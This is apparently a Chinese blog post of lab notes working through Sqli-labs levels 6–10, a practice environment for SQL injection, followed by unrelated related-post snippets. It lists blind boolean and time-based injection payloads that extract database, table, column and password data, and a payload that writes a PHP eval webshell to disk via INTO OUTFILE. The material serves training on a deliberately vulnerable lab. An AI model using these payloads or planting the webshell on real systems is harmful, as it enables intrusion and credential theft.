重闯Sqli-labs关卡第三天(6-10关)
第六关(双注入GET双引号字符型注)
核心代码:
1 $id = '"'.$id.'"';
2 $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
根第五关类似
第七关(导出文件GET字符型注入)
核心代码
$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
不返回mysql错误
检测secure_file_prive是否为null 是null则不能写入
SHOW VARIABLES LIKE “secure_file_priv”;
secure_file_priv =空才行
payload:
id=1')) and 1=1--+
id=1')) and 1=2--+
#写入一句话webshell
id=1'))UNION SELECT 1,"<?php @eval($_POST['X']);?>",3 into outfile "C:\\phpStudy\\PHPTutorial\\WWW\\lou\\sql\\Less-7\\muma.php"--+
参考学习:https://blog.csdn.net/Jiajiajiang_/article/details/86226884
第八关(布尔型单引号GET盲注)
payload:
1 判断数据库长度
2 ' and length(database())=8--+
3 爆数据库名
4 ' and left((select database()),1)='s'--+
5 判断数据库中表的数量
6 ' and if((select count(*) from information_schema.tables where table_schema=database())>1,sleep(5),1)--+
7 ' and (select count(*) from information_schema.tables where table_schema=database())>1 --+
8 爆表名
9 ' and left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r' --+
10 判断字段数量
11 ' and (select count(*) from information_schema.columns where table_name='users')>1--+
12 爆字段名
13 ' and left((select column_name from information_schema.columns where table_name='users' limit 1,1),1)='f'--+
14 爆数据
15 ' and left((select password from users limit 0,1),1)='D' --+
第九关(基于时间的GET单引号盲注)
payload:
1 ' and if(length(database())=8,sleep(3),1)--+
2 ' and if(left(database(),1)='s',sleep(3),1)--+
3 ' and if(left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r',sleep(3),1)--+
4 ' and if(left((select column_name from information_schema.columns where table_name='users' limit 4,1),8)='password',sleep(3),1)--+
5 ' and if(left((select password from users limit 0,1),1)='D',sleep(3),1) --+
第十关(基于时间的双引号盲注)
payload:
1 " and if(length(database())=8,sleep(3),1)--+
2 " and if(left(database(),1)='s',sleep(3),1)--+
3 " and if(left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r',sleep(3),1)--+
4 " and if(left((select column_name from information_schema.columns where table_name='users' limit 4,1),8)='password',sleep(3),1)--+
5 " and if(left((select password from users limit 0,1),1)='D',sleep(3),1)--+
11111
1
11111
1
重闯Sqli-labs关卡第三天(6-10关)的更多相关文章
- Sqli labs系列-less-3 。。。
原本想着找个搜索型的注入玩玩,毕竟昨天被实力嘲讽了 = = . 找了好长时间,我才发现,我没有 = = ,网上搜了一个存在搜索型注入的源码,我看了好长时间,楞没看出来从哪里搜索注入了....估计是我太 ...
- Sqli labs系列-less-2 详细篇
就今天晚上一个小插曲,瞬间感觉我被嘲讽了. SQL手工注入这个东西,杂说了吧,如果你好久不玩的话,一时说开了,你也只能讲个大概,有时候,长期不写写,你的构造语句还非常容易忘,要不我杂会被瞬间嘲讽了啊. ...
- Sqli labs系列-less-1 详细篇
要说 SQL 注入学习,网上众多的靶场,就属 Sqli labs 这个系列挺不错的,关卡达到60多关了,我自己也就打了不几关,一个挺不错的练习SQL注入的源码. 我一开始就准备等我一些原理篇总结完了, ...
- SQLI LABS Basic Part(1-22) WriteUp
好久没有专门练SQL注入了,正好刷一遍SQLI LABS,复习巩固一波~ 环境: phpStudy(之前一直用自己搭的AMP,下了这个之后才发现这个更方便,可以切换不同版本的PHP,没装的小伙伴赶紧试 ...
- XMU 1615 刘备闯三国之三顾茅庐(三) 【欧拉函数+快速幂+欧拉定理】
1615: 刘备闯三国之三顾茅庐(三) Time Limit: 1000 MS Memory Limit: 128 MBSubmit: 45 Solved: 8[Submit][Status][W ...
- 重闯Sqli-labs关卡第三天(11-15关)
前言 今天早上学了学网易云课堂的注入课程突然感觉网易云可i春秋联合出品的课程还不错,之后就刷了刷攻防世界的题,题有眉目但是还是忍不住看了WP 服了自己了!!!一直刷到了晚上也不知道几点我妈买了柚子回了 ...
- 重闯Sqli-labs关卡第二天(5关)
第五关(双注入GET单引号字符型注入-报错时间注入) 盲注盲注,Blind SQL Injection基于布尔SQL盲注基于时间的SQL盲注基于报错的SQL盲注 核心代码:(不会返回数据库中的数据) ...
- 重闯Sqli-labs关卡第一天(1-4关)
前言 之前暑假闯了很多关但是最近刷BUGku的题 遇到SQL注入题就凉... 垃圾的我只能继续硬着头皮重新再来学习,再来闯. 第一关:字符型注入 字符型注入就是注入点的数据类型是字符型.字符型注入与数 ...
- SQLI LABS Advanced Part(23-37) WriteUp
继续继续!这里是高级部分! less-23: 提示输入id参数,尝试: ?id=1' and '1 返回的结果与?id=1相同,所以可以直接利用了. ?id=1' order by 5# 可是页面返回 ...
随机推荐
- 浏览器页面左上角出现undefined
浏览器页面左上角出现undefined, js文档中: let list; list += html代码; 解决办法: let list = html代码;
- 操作系统OS基础
OS: Operating System 操作系统,通用目的的软件程序 主要功能:硬件驱动 进程管理 内存管理 网络管理 安全管理 文件管理OS分类:服务器OS:CentOS,Ubuntu,Windo ...
- CUDA和cuDNN的安装
CUDA软件 Windows 打开NVIDIA CUDA网站,选择需要下载的版本,依次选择Windows平台,x86_64架构,10系统,exe(local)本地安装包,再选择Download即可下载 ...
- 国内npm镜像源设置
淘宝npm镜像 搜索地址:http://npm.taobao.org/ registry地址:http://registry.npm.taobao.org/ cnpmjs镜像 搜索地址:http:// ...
- python图片验证码识别最新模块muggle_ocr
一.官方文档 https://pypi.org/project/muggle-ocr/ 二模块安装 pip install muggle-ocr # 因模块过新,阿里/清华等第三方源可能尚未更新镜像, ...
- h5 返回上一页面方法
//以下方法仅供参考1.返回上一页,不刷新history.html window.history.go(-1); javascript:window.history.go(-1) 2.返回上一页并刷 ...
- windows18.04远程桌面连接ubuntu16.04
方法1: https://www.cnblogs.com/xuliangxing/p/7642650.html 方法2: 也可以通过在ubuntu上安装samba.
- router-view组件在app.vue中渲染不出来怎么办
1.在app.vue使用router-view组件直接渲染 页面什么都没显示,可能问题出在路由配置上了,检查路由是否配置完好,路由挂载那里必须使用routes属性 2.在app.vue中router- ...
- LoadRunner11web压力测试录制、回放、负载前的准备
以前都是利用LoadRunner进行接口测试.自动化测试.压力测试.最近要对web系统做录制压测,因此花费了很长时间来研究这方面的工作.以下是我web端录制.压测过程的流程以及遇到的坑. 一.启动Vi ...
- 1_Two Sum
1.Two Sum Given an array of integers, return indices of the two numbers such that they add up to a s ...